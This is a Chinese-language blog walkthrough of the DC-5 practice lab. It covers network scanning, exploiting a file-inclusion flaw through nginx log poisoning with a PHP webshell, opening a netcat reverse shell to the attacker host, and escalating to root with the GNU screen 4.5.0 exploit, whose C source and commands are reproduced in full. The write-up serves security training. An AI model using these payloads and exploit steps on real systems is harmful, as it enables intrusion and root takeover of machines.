DC-5靶机

ifconfig

查找主机IP

扫一波内网,探测下存活主机

nmap 192.168.61.0/24

使用nmap工具对DC-5靶机扫描开放的端口

nmap -A -T4 192.168.61.133 -p- -oN nmap133.A

(中途IP改成了192.168.61.134)

开放了80,111,39542

打开显示的IP地址

 在concat界面把信息填写,就会跳转页面,是GET传参

 反复刷新会发现时间有变化,猜测页面存在文件包含(?)

然后用burp爆破页面(御剑扫不出来)

一共7个

 footer可以看到这个,确认这个是包含界面

使用BurpSuite爆破文件包含的变量名,及后台passwd文件存在位置

变量名:file,passwd文件位置:/etc/passwd

查看日志保存位置:

法一:

使用BurpSuite抓包爆破靶机日志文件的位置,爆破成功

/var/log/nginx/error.log
/var/log/nginx/access.log 

法二:

file==/etc/nginx/nginx.conf

<?php system($_GET['test']);?>

使用BurpSuite修改数据包数据,写入一句话木马,打开日志文件可以看到成功写入

使用一句话木马执行命令

/var/log/nginx/error.log&test=ls

 在kali进行监听

netcat -l -p 4444
file=/var/log/nginx/error.log&test=nc+192.168.61.129+4444+-e+/bin/bash

然后

python -c 'import pty;pty.spawn("/bin/sh")'

 查找权限

(130条消息) find / -perm -4000 2>/dev/null的拆分讲解_Marx_Otto的博客-CSDN博客 

find / -perm /4000 2>/dev/null

简单来说:寻找 4000权限的文件,不显示其他的错误信息相当于过滤。 

screen-4.5.0:命令行终端切换的软件,通过它同时连接几个本地或远程的命令行会话,可以作为一个提权的点

查看漏洞

把文件提取出来

cp /usr/share/exploitdb/exploits/linux/local/41154.sh screen_450.sh

cp /usr/share/exploitdb/exploits/linux/local/41152.sh screen_450.txt

打开文件

cat screen_450.txt
cat screen_450.sh

根据提示把代码保存到/tmp下

分别保存为

rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

libhax.c 

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

然后把rootshell.c编译成rootshell

gcc -o /tmp/rootshell /tmp/rootshell.c

把libhax.c编译成libhax.so 

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

先是libhax.so

在虚拟机

nc -lvvp 4444 < libhax.so

在目标机

nc 192.168.61.129 4444 > libhax.so

 然后在主机上ctrl+c终止

然后是rootshell

在虚拟机

nc -lvvp 4444 < rootshell

在目标机

nc 192.168.61.129 4444 > rootshell

在目标机上查看,可以看到传入成功 

 然后进行一系列的提权步骤

(之前漏洞信息里有步骤)

cd /etc

umask 000

screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"

screen -ls

/tmp/rootshell

然后就获得root权限了(whoami查看)

cd /root

ls

cat thisistheflag.txt

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值